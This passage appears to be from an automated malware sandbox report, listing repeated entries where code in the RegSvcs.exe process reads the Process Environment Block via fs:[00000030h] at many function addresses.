Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140218 mov eax, dword ptr fs:[00000030h]	7_2_01140218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112823B mov eax, dword ptr fs:[00000030h]	7_2_0112823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A250 mov eax, dword ptr fs:[00000030h]	7_2_0112A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136259 mov eax, dword ptr fs:[00000030h]	7_2_01136259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8243 mov eax, dword ptr fs:[00000030h]	7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8243 mov ecx, dword ptr fs:[00000030h]	7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112826B mov eax, dword ptr fs:[00000030h]	7_2_0112826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h]	7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h]	7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h]	7_2_011402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h]	7_2_011402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E59C mov eax, dword ptr fs:[00000030h]	7_2_0116E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132582 mov eax, dword ptr fs:[00000030h]	7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132582 mov ecx, dword ptr fs:[00000030h]	7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A580 mov ecx, dword ptr fs:[00000030h]	7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A580 mov eax, dword ptr fs:[00000030h]	7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164588 mov eax, dword ptr fs:[00000030h]	7_2_01164588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h]	7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h]	7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011365D0 mov eax, dword ptr fs:[00000030h]	7_2_011365D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h]	7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h]	7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011325E0 mov eax, dword ptr fs:[00000030h]	7_2_011325E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h]	7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h]	7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A430 mov eax, dword ptr fs:[00000030h]	7_2_0116A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C427 mov eax, dword ptr fs:[00000030h]	7_2_0112C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115245A mov eax, dword ptr fs:[00000030h]	7_2_0115245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h]	7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A471 mov eax, dword ptr fs:[00000030h]	7_2_0113A471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h]	7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC460 mov ecx, dword ptr fs:[00000030h]	7_2_011BC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011644B0 mov ecx, dword ptr fs:[00000030h]	7_2_011644B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011264BA mov eax, dword ptr fs:[00000030h]	7_2_011264BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BA4B0 mov eax, dword ptr fs:[00000030h]	7_2_011BA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011364AB mov eax, dword ptr fs:[00000030h]	7_2_011364AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011304E5 mov ecx, dword ptr fs:[00000030h]	7_2_011304E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130710 mov eax, dword ptr fs:[00000030h]	7_2_01130710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160710 mov eax, dword ptr fs:[00000030h]	7_2_01160710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C700 mov eax, dword ptr fs:[00000030h]	7_2_0116C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov ecx, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h]	7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AC730 mov eax, dword ptr fs:[00000030h]	7_2_011AC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h]	7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h]	7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130750 mov eax, dword ptr fs:[00000030h]	7_2_01130750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE75D mov eax, dword ptr fs:[00000030h]	7_2_011BE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h]	7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h]	7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4755 mov eax, dword ptr fs:[00000030h]	7_2_011B4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A740 mov eax, dword ptr fs:[00000030h]	7_2_0112A740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov esi, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h]	7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01138770 mov eax, dword ptr fs:[00000030h]	7_2_01138770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h]	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011307AF mov eax, dword ptr fs:[00000030h]	7_2_011307AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B07C3 mov eax, dword ptr fs:[00000030h]	7_2_011B07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C7F0 mov eax, dword ptr fs:[00000030h]	7_2_0116C7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h]	7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h]	7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h]	7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BE7E1 mov eax, dword ptr fs:[00000030h]	7_2_011BE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172619 mov eax, dword ptr fs:[00000030h]	7_2_01172619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE609 mov eax, dword ptr fs:[00000030h]	7_2_011AE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E627 mov eax, dword ptr fs:[00000030h]	7_2_0114E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01166620 mov eax, dword ptr fs:[00000030h]	7_2_01166620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168620 mov eax, dword ptr fs:[00000030h]	7_2_01168620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113262C mov eax, dword ptr fs:[00000030h]	7_2_0113262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114C640 mov eax, dword ptr fs:[00000030h]	7_2_0114C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162674 mov eax, dword ptr fs:[00000030h]	7_2_01162674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h]	7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h]	7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114266C mov eax, dword ptr fs:[00000030h]	7_2_0114266C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h]	7_2_01134690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h]	7_2_01134690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C68B mov eax, dword ptr fs:[00000030h]	7_2_0116C68B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011666B0 mov eax, dword ptr fs:[00000030h]	7_2_011666B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0116C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h]	7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h]	7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h]	7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h]	7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BC912 mov eax, dword ptr fs:[00000030h]	7_2_011BC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h]	7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h]	7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h]	7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h]	7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B892A mov eax, dword ptr fs:[00000030h]	7_2_011B892A
